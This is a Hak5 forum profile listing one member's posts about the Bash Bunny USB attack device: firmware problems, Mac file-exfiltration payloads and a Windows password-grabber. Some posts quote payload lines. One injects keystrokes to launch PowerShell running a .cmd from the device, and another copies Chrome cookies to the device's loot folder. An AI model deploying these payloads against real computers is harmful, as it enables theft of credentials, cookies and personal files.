Opticon

Active Members
  • Content Count: 19

About Opticon

  • Rank
    Hak5 Fan

  1. Hello again @datguy_dev ! As @Dave-ee Jones suggested, you may be able to resolve it using my method. However, I am not daft nor ignorant, as you wrote; I'm truly sorry for your situation, as I have exhausted all options. Put in a word to Hak5 and see about an exchange.
  2. @datguy_dev Well guess what? Mine did the same thing. It was just as you wrote; "there is a duration of time of when the BB is left unplugged - that when plugged back into a power source - that produces different boot sequences for the BB." So, I'll tell you when this started becoming an issue, not to mention I lost the ability to use payloads in switch position 2. I was advised to update to firmware 1.3, as new features had been made available. I was running the out-of-box 1.0 without incident. After writing and researching, I changed to a firmware that I hadn't used, as recovery mode would not work, contrary to what is in writing. Firmware 1.2 resolved it. Every single time I use it, it operates the same, with no random lights at boot or disconnection from my system, and I can leave it plugged in for hours. So contrary to any advice given on the board, I will not use 1.3 as it caused a myriad of problems including everything you wrote and more! -Cheers
  3. Just a quick question, @Mrnoname. The Bunny is convenient and essentially useable as it is a USB device. Thus, any computer is vulnerable as long as they have USB ports- never seen one yet that doesn't. How practical would a device with an HDMI interface be in the world of pentesters? Better yet, can you name a single instance where this would be of use, and please don't write back Kodi. -Cheers
  4. Great work @couchTornado! I hope you received my message. Also, @WiFiJuice posted a great keyboard map for the Swedish layout, and like so many others confirmed that the one being downloaded is incorrect and/or corrupt. Good luck with this firmware issue. I refuse to go to 1.3 because it renders all Mac payloads useless.
  5. Opticon

    macinfograbber

    Thank you @unixnerd777 and @couchTornado. When I am finished with the rewrite of the original, I'll be sure to add these details to the payload.
  6. @WiFiJuice You bring up an excellent point, one that I wish the developers would have anticipated. Hopefully, as you've addressed this problem before, they will look into resolving language files. Perhaps it's the reason my payload didn't work for you, but that's only speculation.
  7. Well @WiFiJuice I'll get working on it. However, here's a pertinent question, what firmware are you currently using? I've found 1.2 to be the most reliable firmware for the Bash Bunny. I've had nothing but trouble with 1.3. Restores and switches that won't execute payloads etc. What are your thoughts? I invite the entire community @couchTornado @Firestorm @Sebkinne @Darren Kitchen et al to answer. -Cheers
  8. For reasons unknown to myself, MacOS or OSX has been greatly overlooked where the Bash Bunny is concerned. Having extensive knowledge of the architecture to make an actual Mac exfiltration possible led me to this script. Previous deprecated versions of the original may exist, however, they were myopic in scope and failed upon execution. Allow me to introduce Mac Master Exfil, or MME 1.0, which I hope will guide other Mac enthusiasts to add to this project. It is currently pending approval at Github. DM me for the code. Thank you all :-)
  9. @WiFiJuice The DM has been sent and I hope you enjoy it! Let me know if there's anything you would add or subtract from the payload. Cheers!
  10. @WiFiJuice Not at all! Would you like me to post the code publicly, on this forum, Github etc...? Let me just go ahead and do all of the aforementioned, that way I'm not keeping secrets from anyone!
  11. Thank you @WiFiJuice. Macinfograbber, after altering code parameters, will fetch any document you'd like. I have mine set to go to the Desktop, Documents, and Home directories, and exfiltrate DOC, DOCX, PDF, PNG, JPG, JPEG, MOV, XLS, XLSX and more! I've tested the rewrite on several Macs and don't you know- it works on them all! However, @couchTornado has a valid point regarding NMAP and OSX. I'll start to work on something and share my results either here or on Github. Just a thought before I log off, but if NMAP can't be used, what if we just call upon something inherent to Terminal? Such as:

      Scan the available wireless networks: /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport -s
      Set up a network listener on port 2196 for testing: /usr/bin/nc -l 2196
      Capture some packets: tcpdump -nS
      Capture all the packets: tcpdump -nnvvXS
      Capture the packets for a given port: tcpdump -nnvvXS port 548

      These are just a couple of things to consider while I toil away with a proper OSX NMAP hack. Cheers!
  12. @WiFiJuice I've been at this for a long time, as I bought the BB when it was first released. However, the following payloads never worked for me, and I was constantly looking for feedback over at Github: MacReverseShell, MacGetUsers, MacPFDExfil, etc. However, the one that has worked, and is easily modifiable to grab files from multiple directories, is macinfograbber. Great payload and I tip my hat to @kmakblob for this. Any other questions, please feel free to hit me up anytime :-)
  13. Opticon

    Violation of CoC

    @Dave-ee Jones @illwill Thank you for everything you provided. The code for PasswordGrabber is as follows:

        LED ATTACK
        ATTACKMODE HID STORAGE
        DUCKY_LANG se
        RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
        LED FINISH

    Can I simply replace the d.cmd file with the one used in WifiCreds? Or do I need to retool the powershell code also? Thanks again!
  14. Opticon

    Violation of CoC

    @illwill You have placed so much effort into this, as has Sally Vendeven. Unfortunately, neither of these work on three Windows 10 boxes and four VMs. Sadly, running a.cmd does exactly what this payload proposes to do, but you must execute it manually. So, if I'm left with no other option, using several scenarios, how do I make a simple payload that calls upon a.cmd? Seriously! After months of coding and comparing, the Windows-based command works effortlessly. Let it do just that, and teach us all how to call upon that file in the beginning and leave it there. Please get back to me at your convenience, as I appreciate your time. -Opticon
  15. So, when using macinfograbber it doesn't work unless I comment out the following lines:

      QUACK STRING cat \~/Library/Application\\ Support/Google/Chrome/Default/Cookies \> /Volumes/BashBunny/$lootdir/chromecookies.db

      Upon further inspection, I located my Cookies file on all of my Macs. It's here:

      /Library/Application\\ Support/Google/Chrome/Profile\\ 3/Cookies

      Is there anything I can do to change this? Meaning, are all of my computers unique in some way, or is this normal Chrome file placement, and can code be added to look for all profile folders and the cookie files therein? Thanks in advance! -Cheers!